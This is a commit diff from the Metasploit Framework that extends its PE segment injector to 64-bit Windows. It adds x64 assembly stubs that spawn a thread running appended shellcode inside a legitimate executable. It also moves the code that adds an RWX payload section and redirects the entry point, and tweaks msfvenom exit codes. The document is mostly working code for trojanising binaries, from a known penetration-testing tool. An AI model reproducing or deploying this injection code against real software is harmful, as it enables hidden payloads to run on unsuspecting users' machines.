Land rapid7#5864, @jlee-r7's fixes x64 injection

jvazquez-r7 · jvazquez-r7 · commit ad0140e0fcb0 · 2015-09-11T16:09:37.000-05:00
diff --git a/lib/msf/core/exe/segment_injector.rb b/lib/msf/core/exe/segment_injector.rb
@@ -15,8 +15,20 @@ def initialize(opts = {})
       @payload = opts[:payload]
       @template = opts[:template]
       @arch  = opts[:arch] || :x86
-      @buffer_register = opts[:buffer_register] || 'edx'
-      unless %w{eax ecx edx ebx edi esi}.include?(@buffer_register.downcase)
+      @buffer_register = opts[:buffer_register]
+
+      x86_regs = %w{eax ecx edx ebx edi esi}
+      x64_regs = %w{rax rcx rdx rbx rdi rsi} + (8..15).map{|n| "r#{n}" }
+
+      @buffer_register ||= if @arch == :x86
+                             "edx"
+                           else
+                             "rdx"
+                           end
+
+      if @arch == :x86 && !x86_regs.include?(@buffer_register.downcase)
+        raise ArgumentError, ":buffer_register is not a real register"
+      elsif @arch == :x64 && !x64_regs.include?(@buffer_register.downcase)
         raise ArgumentError, ":buffer_register is not a real register"
       end
     end
@@ -27,10 +39,58 @@ def processor
         return Metasm::Ia32.new
       when :x64
         return Metasm::X86_64.new
+      else
+        raise "Incompatible architecture"
       end
     end
 
     def create_thread_stub
+      case @arch
+      when :x86
+        create_thread_stub_x86
+      when :x64
+        create_thread_stub_x64
+      else
+        raise "Incompatible architecture"
+      end
+    end
+
+    def create_thread_stub_x64
+      <<-EOS
+        mov rcx, hook_libname
+        sub rsp, 30h
+        mov rax, iat_LoadLibraryA
+        call [rax]
+        add rsp, 30h
+
+        mov rdx, hook_funcname
+        mov rcx, rax
+        sub rsp, 30h
+        mov rax, iat_GetProcAddress
+        call [rax]
+        add rsp, 30h
+
+        push 0
+        push 0
+        mov r9, 0
+        mov r8, thread_hook
+        mov rdx, 0
+        mov rcx, 0
+        call rax
+        add rsp,10h ; clean up the push 0 above
+
+        jmp entrypoint
+
+        hook_libname db 'kernel32', 0
+        hook_funcname db 'CreateThread', 0
+
+        thread_hook:
+        mov #{buffer_register}, shellcode
+        shellcode:
+      EOS
+    end
+
+    def create_thread_stub_x86
       <<-EOS
         pushad
         push hook_libname
@@ -54,15 +114,17 @@ def create_thread_stub
         hook_funcname db 'CreateThread', 0
 
         thread_hook:
-        lea #{buffer_register}, [thread_hook]
-        add #{buffer_register}, 9
+        lea #{buffer_register}, [shellcode]
+        shellcode:
       EOS
     end
 
     def payload_stub(prefix)
       asm = "hook_entrypoint:\n#{prefix}\n"
       asm << create_thread_stub
+
       shellcode = Metasm::Shellcode.assemble(processor, asm)
+
       shellcode.encoded + @payload
     end
 
@@ -73,10 +135,9 @@ def is_warbird?(pe)
       # .text:004136BC                 sar     ecx, 1
       # .text:004136BE                 mov     eax, [eax+0Ch]
       # .text:004136C1                 add     eax, 0Ch
-      pattern = /\x64\xA1\x30\x00\x00\x00\x2B\xCA\xD1\xF9\x8B\x40\x0C\x83\xC0\x0C/
-      sections = {}
-      pe.sections.each {|s| sections[s.name.to_s] = s}
-      if sections['.text'].encoded.pattern_scan(pattern).blank?
+      pattern = "\x64\xA1\x30\x00\x00\x00\x2B\xCA\xD1\xF9\x8B\x40\x0C\x83\xC0\x0C"
+      section = pe.sections.find { |s| s.name.to_s == '.text' }
+      if section && section.encoded.pattern_scan(pattern).blank?
         return false
       end
 
@@ -99,6 +160,32 @@ def generate_pe
       # Don't rebase if we can help it since Metasm doesn't do relocations well
       pe.optheader.dll_characts.delete("DYNAMIC_BASE")
 
+      prefix = dll_prefix(pe)
+
+      # Generate a new code section set to RWX with our payload in it
+      s = Metasm::PE::Section.new
+      s.name = '.text'
+      s.encoded = payload_stub(prefix)
+      s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
+
+      # Tell our section where the original entrypoint was
+      if pe.optheader.entrypoint != 0
+        s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
+      end
+      pe.sections << s
+      pe.invalidate_header
+
+      # Change the entrypoint to our new section
+      pe.optheader.entrypoint = 'hook_entrypoint'
+      pe.cpu = pe_orig.cpu
+
+      pe.encode_string
+    end
+
+    # @param pe [Metasm::PE]
+    # @return [String] assembly code to place at the entrypoint. Will be empty
+    #   for non-DLL executables.
+    def dll_prefix(pe)
       prefix = ''
       if pe.header.characteristics.include? "DLL"
         # if there is no entry point, just return after we bail or spawn shellcode
@@ -117,24 +204,8 @@ def generate_pe
               jnz entrypoint"
         end
       end
-      # Generate a new code section set to RWX with our payload in it
-      s = Metasm::PE::Section.new
-      s.name = '.text'
-      s.encoded = payload_stub prefix
-      s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
 
-      # Tell our section where the original entrypoint was
-      if pe.optheader.entrypoint != 0
-        s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
-      end
-      pe.sections << s
-      pe.invalidate_header
-
-      # Change the entrypoint to our new section
-      pe.optheader.entrypoint = 'hook_entrypoint'
-      pe.cpu = pe_orig.cpu
-
-      pe.encode_string
+      prefix
     end
 
   end
diff --git a/msfvenom b/msfvenom
@@ -284,7 +284,7 @@ if __FILE__ == $0
     generator_opts = parse_args(ARGV)
   rescue MsfVenomError, Msf::OptionValidateError => e
     $stderr.puts "Error: #{e.message}"
-    exit(-1)
+    exit(1)
   end
 
   if generator_opts[:list]
@@ -348,7 +348,7 @@ if __FILE__ == $0
   end
 
   # No payload generated, no point to go on
-  exit(-1) unless payload
+  exit(2) unless payload
 
   if generator_opts[:out]
     begin
